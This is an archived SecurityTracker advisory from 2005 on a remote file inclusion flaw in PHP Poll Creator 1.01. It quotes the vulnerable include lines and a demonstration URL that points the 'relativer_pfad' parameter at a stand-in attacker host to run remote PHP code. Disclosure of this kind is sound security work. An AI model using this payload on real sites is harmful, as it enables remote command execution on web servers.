SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Poll Creator Vendors:   phppc.de
PHP Poll Creator Include File Error Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014061
SecurityTracker URL:  http://securitytracker.com/id/1014061
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 26 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.01
Description:   A vulnerability was reported in PHP Poll Creator. A remote user can execute arbitrary commands on the target system.

The 'poll_vote.php' script includes files relative to the 'relativer_pfad' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/poll_vote.php?relativer_pfad=http://[attacker]/dir/

rash from Search Vulnerabilities Team reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phppc.de/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP Injection in PHP Poll Creator




svadvisory#6
-------------------------------------------------------------+
    Title: PHP Injection in PHP Poll Creator                 |
 Software: PHP Poll Creator v 1.01                           |
 Homepage: http://www.phppc.de                  +------------+
   Finder: rash                                 |  24.05.05  |
-------------------------------------------------------------+

Description
-------------------------------------------------------------|

Vulnerability has been found in file poll_vote.php

<?php
include $relativer_pfad . "config.inc.php";
include ($relativer_pfad . "lib/functions.inc.php");
....
?>

one can implement any php code, what we need are it, a delivery
the variable $relativer_pfad over URL, with which defintion our
address to our file with php the code this file must absolutely
config.inc.php is designated, otherwise cannot it not function
where one this file put down are it no matter, main thing one
give the exact address to the file config.inc.php with php the
code to where them are.

Example
-------------------------------------------------------------|

poll_vote.php?relativer_pfad=http://domain.tld/dir/


Conclusion
-------------------------------------------------------------|

as I understood it, this is not any longer developed further
script program, but I go of it out of that, all versions am
concerned, but without guarantee.

#############################################################

rash || Search Vulnerabilities Team || www.svt.nukleon.us

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC